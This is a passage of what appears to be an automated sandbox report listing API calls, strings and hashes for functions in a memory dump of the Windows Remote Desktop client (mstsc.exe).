                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                                                                                                        • String ID: GetAppContainerRegistryLocation$phKey$userenv.dll
                                                                                                                                                                                        • API String ID: 1294741123-4274605286
                                                                                                                                                                                        • Opcode ID: d640a6554c9e5a369211cc3fd2304c9081250a01140d33dba903d2ae0e776838
                                                                                                                                                                                        • Instruction ID: e80e94a92aff5282eddb8318a5693acefe2e9a1346368ffd4137113a9b9fb2e3
                                                                                                                                                                                        • Opcode Fuzzy Hash: d640a6554c9e5a369211cc3fd2304c9081250a01140d33dba903d2ae0e776838
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1441AEB37903696FD3384BA88D48F6A2B99FB05350F050546F860EB272C674CC80EF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _wcsnicmp
                                                                                                                                                                                        • String ID: MRU0$MRU1$MRU2$MRU3$MRU4$MRU5$MRU6$MRU7$MRU8$MRU9
                                                                                                                                                                                        • API String ID: 1886669725-961220685
                                                                                                                                                                                        • Opcode ID: 1b15b476979341acfa44255c47bf595ed872ee17f3009c3ec0afb025988e5f4d
                                                                                                                                                                                        • Instruction ID: f62036dce7bb4d6fb4e8d2bcd8e24277b829bf465d5010f75ac3b660435a9800
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b15b476979341acfa44255c47bf595ed872ee17f3009c3ec0afb025988e5f4d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6041C671A0071C6BE724DB64CC81BAB77ADFB88300F10857AFDA5E7341D638EE458665
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000033B8), ref: 0090F889
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000033B9), ref: 0090F89A
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000033BA), ref: 0090F8A8
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000033BD), ref: 0090F8F4
                                                                                                                                                                                        • EndDialog.USER32 ref: 0090F90D
                                                                                                                                                                                        • EndDialog.USER32 ref: 0090F98E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonChecked$Dialog
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3363682351-0
                                                                                                                                                                                        • Opcode ID: 78dc83835e361f7cf1ec7bcc4b828174dbcff1692aaa11e2158f43879075475f
                                                                                                                                                                                        • Instruction ID: 3aaf3cd6025a3a115fb656fa6a5539b511a925320c0968c77d5d59a295a011d2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 78dc83835e361f7cf1ec7bcc4b828174dbcff1692aaa11e2158f43879075475f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C41D131604208BFDF229F58DC95EA97B6AEB44710F148431FE15AB6E0CB71DB51AF80
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00932458
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 0093245F
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00932474
                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 0093248D
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00932498
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 009324A6
                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 009324D7
                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 009324E0
                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 009324E7
                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 0093250D
                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00932514
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00932527
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Show$Enable
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2939132127-0
                                                                                                                                                                                        • Opcode ID: f61212caf6284a4282f399650e1cd10a5270dfeb7b3058279688fba51b418e59
                                                                                                                                                                                        • Instruction ID: ab918502f88e45afa1d6098ac81b5e99ebf045359f8591f3eee3965af3dad6af
                                                                                                                                                                                        • Opcode Fuzzy Hash: f61212caf6284a4282f399650e1cd10a5270dfeb7b3058279688fba51b418e59
                                                                                                                                                                                        • Instruction Fuzzy Hash: 31416770A04615FFCB249F24DC88B29BBB9FB04711F114025FA01A72B0D732ADA0EF91
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • DynamicDevices, xrefs: 00900568
                                                                                                                                                                                        • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 00900366
                                                                                                                                                                                        • ;, xrefs: 009002F8
                                                                                                                                                                                        • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 009006F9, 00900758
                                                                                                                                                                                        • IMsRdpDeviceCollection::GetDeviceCount failed, xrefs: 0090041D
                                                                                                                                                                                        • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009003CE
                                                                                                                                                                                        • StringCchCopy failed, xrefs: 00900473
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: ;$DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDeviceCollection::GetDeviceCount failed$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                                                                                                        • API String ID: 0-4264136737
                                                                                                                                                                                        • Opcode ID: e0ab5f5a0844c392a832127cb932d0661d70a7ae3f7b448bb735ce52abb5227f
                                                                                                                                                                                        • Instruction ID: c248653e21536ae67ebba20f829706c444d0fbd5bf2ecc48f8a0cc9fd86a7b8b
                                                                                                                                                                                        • Opcode Fuzzy Hash: e0ab5f5a0844c392a832127cb932d0661d70a7ae3f7b448bb735ce52abb5227f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD17C309002199FCB289F15CC85B99B7EAFF81310F0586E9E459AB2E1CF759E81CF90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0093132F
                                                                                                                                                                                        • memset.MSVCRT ref: 00931349
                                                                                                                                                                                        • memset.MSVCRT ref: 00931364
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,008D1B90,?,00000208,00000002,?,?,?,?,?,?,?,00000000,00000000), ref: 00931436
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,cookie=), ref: 0093153E
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 00931560
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to get the clx cookie, xrefs: 00931399
                                                                                                                                                                                        • Init() Error loading CLx DLL., xrefs: 00931475
                                                                                                                                                                                        • No TEST DLL to load, so terminating CLX object, xrefs: 00931415
                                                                                                                                                                                        • cookie=, xrefs: 009314ED
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memset$Library$AddressByteCharErrorFreeHandleLastLoadModuleMultiProcWide
                                                                                                                                                                                        • String ID: Failed to get the clx cookie$Init() Error loading CLx DLL.$No TEST DLL to load, so terminating CLX object$cookie=
                                                                                                                                                                                        • API String ID: 3214168845-1061671136
                                                                                                                                                                                        • Opcode ID: f20272d1a6a56d317171f2c4afdd79081c00d3d89f390712a57f513f0e605c8a
                                                                                                                                                                                        • Instruction ID: d6ce5f0b77dae4946ec7c22a5c9d5e41b4c1132cd198d454e640bac5659ccf9f
                                                                                                                                                                                        • Opcode Fuzzy Hash: f20272d1a6a56d317171f2c4afdd79081c00d3d89f390712a57f513f0e605c8a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6491D171614318AFDB289FA4DC89FAA7BA9EF09310F050099F945E72B2D634DE84CF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CredFree.ADVAPI32(00000000,?,00000000,00000000), ref: 00918491
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0091849C
                                                                                                                                                                                        • CredReadDomainCredentialsW.ADVAPI32(?,00000000,?,?), ref: 00918515
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 0091851F
                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 009185D5
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000), ref: 0091861E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000A,008E396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00913B87), ref: 008ED673
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$CredLocal$AddressAllocCredentialsDomainErrorHandleLastLibraryMessageModuleProcReadTrace_wcsicmp
                                                                                                                                                                                        • String ID: CredReadDomainCredentials$StringCbCopy$StringCchCopy$allocate memory for userName
                                                                                                                                                                                        • API String ID: 2989600279-4106186159
                                                                                                                                                                                        • Opcode ID: 8aa26a55792a306c37d2092b0152519e9e34355fd2df66a72331ad3a637a4caa
                                                                                                                                                                                        • Instruction ID: 9f5f977be5c34daceaa46e3702bdd6191aecd1133d0d7389106d0cdf6c179c7a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aa26a55792a306c37d2092b0152519e9e34355fd2df66a72331ad3a637a4caa
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F91AF32B00359ABCB299F99DC88B9A77AAFB49304F0500D9E505A72B1DF30DDC1AF45
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(?,008EEFB6,00000000), ref: 008EEAFB
                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?,?,008EEFB6,00000000), ref: 008EEB46
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000338B), ref: 008EEB5A
                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 008EEB64
                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008EEB76
                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008EEB88
                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008EEB91
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 008EEB98
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000104,?,?,008EEFB6,00000000), ref: 008EEBF9
                                                                                                                                                                                        • SetWindowTextW.USER32(?,?,?,00000104,?,00000104,?,?,008EEFB6,00000000), ref: 008EECA8
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Rect$ErrorItemLastLong$AddressFreeHandleLibraryModuleProcText
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2044706978-0
                                                                                                                                                                                        • Opcode ID: 706819b3101dcb3abef785295758386b359fb6d349faeb7e857551edf49ee013
                                                                                                                                                                                        • Instruction ID: 64cabbc6735b9d5534a560d728b2c28c541c16dd423070d8f8575b97decc9e7c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 706819b3101dcb3abef785295758386b359fb6d349faeb7e857551edf49ee013
                                                                                                                                                                                        • Instruction Fuzzy Hash: B151B072914284AFCB14DF69CE89E5A7FA6FB8A310B250159F905EB266CA34DC00DF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 009092F3: memset.MSVCRT ref: 00909323
                                                                                                                                                                                          • Part of subcall function 009092F3: SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009093AE
                                                                                                                                                                                          • Part of subcall function 009093CA: GetWindowLongW.USER32(?,000000EC), ref: 009093F2
                                                                                                                                                                                          • Part of subcall function 009093CA: GetDlgItem.USER32(?,00001396), ref: 00909408
                                                                                                                                                                                          • Part of subcall function 009093CA: GetWindowRect.USER32(00000000,?), ref: 00909413
                                                                                                                                                                                          • Part of subcall function 009093CA: ScreenToClient.USER32(?,?), ref: 0090946F
                                                                                                                                                                                          • Part of subcall function 009093CA: SendMessageW.USER32(00000000,0000041F,00000000), ref: 009094A2
                                                                                                                                                                                          • Part of subcall function 009093CA: SetWindowPos.USER32(00000000,00000000,?,00909ADF,?,?,00000004), ref: 009094CE
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00909B2F
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00001394,?,00000000,?,00000110,?,?,?,0090927F,?,?,?), ref: 00909B5A
                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00909B99
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00909B9C
                                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00909BEB
                                                                                                                                                                                        • GetDlgItem.USER32(?,00001394), ref: 00909BF9
                                                                                                                                                                                        • SetFocus.USER32 ref: 00909BFC
                                                                                                                                                                                        • SetFocus.USER32 ref: 00909C0A
                                                                                                                                                                                        • SendMessageW.USER32(?,00000127,00010002,00000000), ref: 00909C21
                                                                                                                                                                                        • GetDlgItem.USER32(?,00001396), ref: 00909C2F
                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?,?,0090927F,?,?,?), ref: 00909C43
                                                                                                                                                                                          • Part of subcall function 00909A59: GetDlgItemTextW.USER32(?,00001394,?,00000100,00000001,?), ref: 00909A87
                                                                                                                                                                                          • Part of subcall function 009211F8: GetDlgItem.USER32(?,?), ref: 00921217
                                                                                                                                                                                          • Part of subcall function 009211F8: EnableWindow.USER32(00000000,0090927F), ref: 00921225
                                                                                                                                                                                          • Part of subcall function 0092123D: GetDlgItem.USER32(?,?), ref: 0092125C
                                                                                                                                                                                          • Part of subcall function 0092123D: ShowWindow.USER32(00000000,0090927F), ref: 00921272
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Item$MessageSendShowText$EnableFocus$ClientLongRectScreenmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1960074330-0
                                                                                                                                                                                        • Opcode ID: 75888b68c09027b36dc3145921665d51d542ed13d2e0cb9b36cfc77a23d12ae6
                                                                                                                                                                                        • Instruction ID: 2f1f3be81bda09a90bdb0cee13033a768b547bf4613e93fbbc1698bd895e05aa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 75888b68c09027b36dc3145921665d51d542ed13d2e0cb9b36cfc77a23d12ae6
                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41DF71744B14BFDB206B619D8AF6F7BAAEBC4B04F404428F14AA61E2CBB16C119F51
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008E45D2: _vsnwprintf.MSVCRT ref: 008E4604
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0091E25E
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0091E2BC
                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 0091E316
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0091E378
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0091E446
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED87E: TraceMessage.ADVAPI32(?,00000000,0000002B,008D8AB4,00000028,00000000,00000004,NULL,0000000A,0091BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 008ED8F1
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0091E494
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • \, xrefs: 0091E1C1
                                                                                                                                                                                        • SOFTWARE\Microsoft\Terminal Server Client\%s, xrefs: 0091E187
                                                                                                                                                                                        • Unable to get AppContainer registry location., xrefs: 0091E223
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Open$Close$AddressEnumFreeHandleLibraryMessageModuleProcTrace_vsnwprintf
                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$Unable to get AppContainer registry location.$\
                                                                                                                                                                                        • API String ID: 1061991183-810003542
                                                                                                                                                                                        • Opcode ID: 2abbc935483677089cb1d4bc02714fc33054d030a8269323fd84d8f0ed1bc191
                                                                                                                                                                                        • Instruction ID: 64f0682b36f04445e99a250a5b07ae893551ca3b4c07345a2b372fd7c307df43
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2abbc935483677089cb1d4bc02714fc33054d030a8269323fd84d8f0ed1bc191
                                                                                                                                                                                        • Instruction Fuzzy Hash: 79A1BB71204348AFDB29DFA9D948FAA7BA9FB49304F044859FA45872B2C730DD81DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00925A4D
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,008D32EC,00000000,00000000), ref: 00925B04
                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000), ref: 00925CF3
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Settings in signscope and file do not match up, xrefs: 00925CC8
                                                                                                                                                                                        • Mandatory sensitive setting not present, xrefs: 00925AA3
                                                                                                                                                                                        • Field in SignScope not found in store, xrefs: 00925C95
                                                                                                                                                                                        • szTempScope, xrefs: 00925B2C
                                                                                                                                                                                        • StringCchCopy failed, xrefs: 00925B98
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$ActivityAllocControlEventFreeMessageTracememset
                                                                                                                                                                                        • String ID: Field in SignScope not found in store$Mandatory sensitive setting not present$Settings in signscope and file do not match up$StringCchCopy failed$szTempScope
                                                                                                                                                                                        • API String ID: 1105911404-2725555693
                                                                                                                                                                                        • Opcode ID: d1019ec72ad2bda6b01b85cecd0949ba39d66f601bfc962e1952ff30213c6374
                                                                                                                                                                                        • Instruction ID: 5697361ebe995efab98e7803155fd1ca0e2102d1989379fdacb7fe19ab44baca
                                                                                                                                                                                        • Opcode Fuzzy Hash: d1019ec72ad2bda6b01b85cecd0949ba39d66f601bfc962e1952ff30213c6374
                                                                                                                                                                                        • Instruction Fuzzy Hash: 66815671604724ABCB29DF24EC45BA677AAFB45304F1240AEE889D7365EB35CD81CF90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 0092D265
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0092D272
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        • LoadIconW.USER32 ref: 0092D2BE
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0092D2C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • SrApiViewerAxContainerClass, xrefs: 0092D25F
                                                                                                                                                                                        • m_spViewer->Initialize failed, xrefs: 0092D3D9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$AddressCreateFreeHandleIconLibraryLoadModuleProcWindow
                                                                                                                                                                                        • String ID: SrApiViewerAxContainerClass$m_spViewer->Initialize failed
                                                                                                                                                                                        • API String ID: 1003384205-847840934
                                                                                                                                                                                        • Opcode ID: 6baea76c9f9e495881b6d0aa75abc3a08269fca596362dda79aabb0eadbde493
                                                                                                                                                                                        • Instruction ID: 7a5d7f36810250dab1593a0139a266aff42277af7ea68fe1b54d5fe258da719d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6baea76c9f9e495881b6d0aa75abc3a08269fca596362dda79aabb0eadbde493
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1951ED72615360AFDB29AF69EC09F163A9ABB45314F040059F945AB2B6C734EC84DB82
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetClassInfoW.USER32(?,TscShellDlg,?), ref: 00921038
                                                                                                                                                                                        • LoadIconW.USER32 ref: 0092106A
                                                                                                                                                                                        • LoadCursorW.USER32 ref: 00921079
                                                                                                                                                                                        • RegisterClassW.USER32(00002808), ref: 00921097
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 009210A2
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00920E30), ref: 00921118
                                                                                                                                                                                        • UnregisterClassW.USER32(TscShellDlg,?,?,00920E30), ref: 00921147
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Class$ErrorLastLoad$CursorIconInfoRegisterUnregister
                                                                                                                                                                                        • String ID: "$TscShellDlg
                                                                                                                                                                                        • API String ID: 1263847228-207632914
                                                                                                                                                                                        • Opcode ID: 14811b3f9d71b24a83abedd23413ead81316f238b6a5a8e8b2a86acb08df098b
                                                                                                                                                                                        • Instruction ID: cfecec74ac2e78d6a8d730f995a61290bc29ce609e36cc8d05f804a7c055bf97
                                                                                                                                                                                        • Opcode Fuzzy Hash: 14811b3f9d71b24a83abedd23413ead81316f238b6a5a8e8b2a86acb08df098b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7831D271948354AFDB189FAAEC08A6ABBBAFF58314F108009F541E72A5CB71D890DF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00924A74
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000001), ref: 00924D85
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
